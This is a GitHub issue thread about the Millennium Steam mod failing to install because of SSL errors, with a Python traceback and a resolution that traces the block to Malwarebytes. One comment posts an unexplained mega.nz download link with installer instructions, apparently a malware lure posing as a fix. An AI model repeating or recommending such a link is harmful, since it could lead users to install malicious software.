### ISSUE TITLE
[Bug] (?) Trying to install yields an SSL error that lasts an hour.

### ISSUE THREAD

**Issue by s626ch** [SteamClientHomebrew/Millennium#85]
### Before Reporting

- [X] I found no existing issues matching my bug
- [X] My issue is not caused by the Millennium interface inside Steam (Themes, Plugins & Update Panel). If it is, make a issue report in [this repo](https://github.com/SteamClientHomebrew/Core).
- [X] My issue is not caused by a theme

### Describe the Bug

I've tried both the automatic installer, and the manual installation method, both results yield in "steambrew.app" being unable to be reached for an hour via an SSL error.

Below is the log output of using the installer script:
```

[57:12.896] INFO Millennium@v2.9.4 is up to date.
[57:12.901] INFO Ports: { FTP: 50168, IPC: 50174 }
[57:12.902] INFO Plugins: { core: Enabled }
[57:12.902] INFO Verifying Python environment...
[57:12.953] INFO Opting to use '8080' for SteamDBG port
[57:12.954] INFO Startup took 337 ms
[57:12.967] INFO Started preloader module
[57:13.189] INFO Connected to Steam @ 0x13f4f070
[57:13.330] PIPX Starting Package Manager...
[57:13.342] PIPX checking for packages on Windows
[57:13.362] PIPX All required packages are satisfied.
[57:13.363] PIPX Finished in 31.54 ms
[57:13.363] INFO Preloader finished...
[57:13.405] CORE Loading Millennium-Core@v2.9.4
[57:13.475] INFO Connected to SharedJSContext in 286 ms
[57:13.476] INFO Injecting frontend shims...
[57:13.476] INFO Registering for load event @ 0x158afb20
Traceback (most recent call last):
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\connectionpool.py", line 466, in _make_request
    self._validate_conn(conn)
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\connectionpool.py", line 1095, in _validate_conn
    conn.connect()
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\connection.py", line 652, in connect
    sock_and_verified = _ssl_wrap_socket_and_match_hostname(
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\connection.py", line 805, in _ssl_wrap_socket_and_match_hostname
    ssl_sock = ssl_wrap_socket(
               ^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\util\ssl_.py", line 465, in ssl_wrap_socket
    ssl_sock = _ssl_wrap_socket_impl(sock, context, tls_in_tls, server_hostname)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\util\ssl_.py", line 509, in _ssl_wrap_socket_impl
    return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "ssl.py", line 517, in wrap_socket
  File "ssl.py", line 1104, in _create
  File "ssl.py", line 1382, in do_handshake
ssl.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:1006)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\connectionpool.py", line 789, in urlopen
    response = self._make_request(
               ^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\connectionpool.py", line 490, in _make_request
    raise new_e
urllib3.exceptions.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:1006)

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\requests\adapters.py", line 667, in send
    resp = conn.urlopen(
           ^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\connectionpool.py", line 843, in urlopen
    retries = retries.increment(
              ^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\urllib3\util\retry.py", line 519, in increment
    raise MaxRetryError(_pool, url, reason) from reason  # type: ignore[arg-type]
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='steambrew.app', port=443): Max retries exceeded with url: /api/v2/checkupdates (Caused by SSLError(SSLError(1, '[SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:1006)')))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:/program files (x86)/steam/ext/data/assets/core/main.py", line 16, in <module>
    updater = Updater()
              ^^^^^^^^^
  File "C:\program files (x86)/steam/ext/data/assets/core\updater\version_control.py", line 179, in __init__
    self.process_updates()
  File "C:\program files (x86)/steam/ext/data/assets/core\updater\version_control.py", line 160, in process_updates
    self.remote_json = self.fetch_updates()
                       ^^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)/steam/ext/data/assets/core\updater\version_control.py", line 147, in fetch_updates
    response = requests.post("https://steambrew.app/api/v2/checkupdates",
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\requests\api.py", line 115, in post
    return request("post", url, data=data, json=json, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\requests\api.py", line 59, in request
    return session.request(method=method, url=url, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\requests\sessions.py", line 589, in request
    resp = self.send(prep, **send_kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\requests\sessions.py", line 703, in send
    r = adapter.send(request, **kwargs)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\program files (x86)\steam\ext\data\cache\Lib\site-packages\requests\adapters.py", line 698, in send
    raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='steambrew.app', port=443): Max retries exceeded with url: /api/v2/checkupdates (Caused by SSLError(SSLError(1, '[SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:1006)')))
[57:14.221] WARN Millennium failed to start 'core'. This is likely due to failing module side effects, unrelated to Millennium.
[57:14.221] WARN Failed to load 'core'
[57:14.222] INFO Finished preparing backends...
[57:14.222] INFO Notifying frontend of backend load...

(┬) [FFI] An error occurred while calling a backend method from [core].
 ├─(evaluated) get_load_config()
 ?─(exception) name 'get_load_config' is not defined
Traceback (most recent call last):
  File "<string>", line 1, in <module>
NameError[57:15.523] WARN (Steam-Error) Failed to fetch settings
  Info: (This warning may be non-fatal)
  Where: (https://steamloopback.host/chunk~2dcc5aaf7.js?contenthash=8cf32b195020ced83261:1:886542)
: name 'plugin' is not defined
```
Attempt to access the steambrew site from a browser (Firefox):
![19uXQYOkJo](https://github.com/user-attachments/assets/b035b831-2664-46e2-8fbe-bf359223f1dd)
Allows me to access the site a few hours later (Firefox):
![XsQHBojyBJ](https://github.com/user-attachments/assets/1477c17b-ff1e-4688-ac49-efe7b62f67f5)

Due to this, steambrew fails to properly function in my client.

Windows 10 IoT Enterprise LTSC - 21H2 (19044.4412)

### Expected Behavior

Well, to be able to install and use this mod.
I have no idea why it's doing this in particular on my system.

### Steps To Reproduce

I'm not sure if this is something that can be easily reproduced, or if it's just literally me.

I mentioned my OS version (Windows 10 IoT Enterprise LTSC - 21H2 (19044.4412))
Steam installation has been left untouched, beyond regular usage for the past few months.
Both install script and manual method leads to this issue.

### Operating System

Windows

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ShadowMonster99** [comment]
It is possibly due to some ISP settings blocking you from reaching Millennium. You could most likely find more information on google as it isn't really a rare issue with networking in general

**Comment by s626ch** [comment]
Installation worked on my other PC and then it hit me that the one difference between these 2 machines is one has an active Malwarebytes subscription.

Yeah, that'll do it.
![2P17dGPerw](https://github.com/user-attachments/assets/fe9159d6-6e29-47c9-99c6-448629481683)

**Comment by madmaxgrey** [comment]
> Installation worked on my other PC, and then it hit me that the one difference between these 2 machines is one has an active Malwarebytes subscription.
> 
> Yeah, that'll do it. ![2P17dGPerw](https://private-user-images.githubusercontent.com/22896890/361273823-fe9159d6-6e29-47c9-99c6-448629481683.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2ODQzOTUsIm5iZiI6MTcyNDY4NDA5NSwicGF0aCI6Ii8yMjg5Njg5MC8zNjEyNzM4MjMtZmU5MTU5ZDYtNmUyOS00N2M5LTk5YzYtNDQ4NjI5NDgxNjgzLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDE0NTQ1NVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPThiOTdjMTMxYzZkNTBhYmFjZWRiNjI1ZjZmMWJlMzI3MDRjOTIxYzcxYzhmMDRjMTY5NWU5NTI0MzE3ZTYyZjYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.LnkSrXjivk3T9lnaFdOID1eZIoNJn4C5WXX9YbC4iqk)

that would be why, malwarebytes doesn't like our site, i would suggest whitelisting the website,
